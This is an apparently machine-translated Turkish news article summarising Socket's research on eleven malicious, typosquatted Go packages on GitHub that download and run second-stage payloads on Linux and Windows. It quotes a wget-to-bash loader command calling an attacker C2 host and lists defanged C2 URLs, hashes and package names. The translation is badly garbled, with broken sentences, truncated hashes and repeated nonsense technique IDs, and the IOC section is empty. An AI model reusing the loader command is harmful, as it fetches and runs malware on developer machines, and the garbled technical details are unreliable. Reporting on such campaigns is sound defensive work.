Tehdit aktörleri tarafından gizlenmiş uzak yükleri dağıtmak için kullanılan kötü amaçlı Go paketleri

Socket’in Tehdit Araştırma Ekibi, GitHub üzerinden dağıtılan on bir kötü niyetli GO paketini belirledi ve kalan on kişi GO modülü aynasında aktif ve geliştiriciler ve CI/CD boru hatları için devam eden riskler ortaya koydu.

Bu paketlerin sekizi, Depolardan doğrudan ithalatların kötü niyetli kodun yanlışlıkla entegrasyonuna yol açabileceği GO’nun merkezi olmayan ekosistemindeki ad alanı karışıklığını kullanmak için meşru modülleri taklit ederek yazım hatası teknikleri kullanır.

Kampanyaya Genel Bakış

Paketler, çalışma zamanında, değiştirilebilir komut ve kontrol (C2) uç noktalarından ikinci aşama yükleri indirmek ve yürütmek için bir kabuk ortaya çıkaran dizin tabanlı bir dize gizleme rutini gizler.

Çoğu uç nokta/depolama/DE373D0DF/A31546BF yolunu paylaşır, altı hala erişilebilir ve tehdit aktörlerinin tehlikeye atılan sistemlere isteğe bağlı erişimi sürdürmesini sağlar.

Bu kampanya, hem Linux Build sunucularını hem de Windows iş istasyonlarını hedefler, platforma özgü yükleyicilerden yararlanır: UNIX’te, wget indirilmiş bash komut dosyalarını doğrudan disksiz yürütme için /bin /bash’a gönderirken, Windows’ta certutil.exe kullanılırken, ingress araç transferi için arka plan işlem enjeksiyonu ve ardından arka plan işlem enjeksiyonu kullanır.

Gözlemlenen yükler, ana bilgisayar bilgilerini numaralandıran, tarayıcı kimlik bilgilerini püskürten ve genellikle bir saatlik bir uykudan önce bir saatlik bir uykudan kaçan işaretler oluşturan ELF ve PE ikili dosyalarını içerir.

Teknik döküm

Gizat mekanizması, github.com/expertsandba/opt’ta örneklendiği gibi, bir işlevin bir exec.command (“/bin/sh”, “-c”. ) SADECE DAHA SADECE ARAYIN “WGET -O -Https: // Monsoletter[.]YBÜ/Depolama/DE373D0DF/A31546BF | /bin/bash & ”.

Bu, bir uyku gecikmesinden sonra kalıcı bir ELF ikili (SHA256: 844013025bf7c5d01e6f48df0e990103301e1463F6CA441) fileSys ve Network istenir.

Benzer desenler, github.com/weightycine/replika gibi paketler arasında, linux’u ve pencereleri hedefleyen çift komutları https: // infinityhel gibi C2’lerle deobuskating gibi görülür.[.]YBÜ/Depolama/DE373D0DF/A31546BF ve https: // Infinityhel[.]ICU/Storage/BBB28EF04/FA31546B, ikincisi kötü amaçlı bir PE yürütülebilir (SHA256: 4A8BF419424FF42B736A51472D35A2C172E4C60462C519B0B2F9EB0B0B04690726 TFT for).

Github.com/ordinarymea/tnsr_ids ve github.com/lastnymph/goid yeniden kullanma C2 altyapısı gibi paketler, ortak bir tehdit oyuncusu öneren, uyku yoluyla kaçırma içeren yüklerle (örn. SHA256: 2B55430B90A500CB2BB9DDC530AEB1FFB8D2F8878148B7204AF998D66EB9D) ve eksfiltrasyon (SHA256: 42F3F9D2684328575847F3115FCD6F759CC47B0F21B3D4FEA480DE0F34A1E947).

Github.com/stripedconsu/linker Github.com/Logrange/Linker ve Github.com/cavernouskina/mcp-go taklit nezaket movalarında görüldüğü gibi riskleri şiddetlendirir, arama sonuçlarının sık sık arızalanmış veya düşük importu modülasyonları verdiği kayıt defteri belirlilikleri.

Ortaklıklar,/depolama/DE373D0DF/A31546BF, tek tip gizemli ve bash-piped yükleyicileri, T1059.004 (UNIX kabuk), T1059.003 (certutil kabuk), T110, T110, T110, T110, T110, T110, T110, T110, T110, T115 (Windows komutu), T105 (T110) gibi hizalayan yedi C2 yolu içerir. (Proses Enjeksiyonu), T1027 (gizlenmiş dosyalar) ve T1036 (MasquerAding).

Rapora göre, bu, tüzüklü modüllerde wget tabanlı yıkıcı yükleri ve kötü amaçlı yazılım yükleyicilerini içeren soket tarafından belgelenen önceki kampanyaları yineliyor.

Çevrimiçi olarak devam eden paketlerle, tehdit aktörleri altyapıyı döndürebilir, gerçek zamanlı bağımlılık taraması, denetimler ve gizleme ve teçhizat zinciri saldırılarını hafifletmek için yazım hatası gibi proaktif savunmalara duyulan ihtiyacın altını çizebilir.

Uzlaşma Göstergeleri (IOCS)

The Ultimate SOC-as-a-Service Pricing Guide for 2025– Ücretsiz indir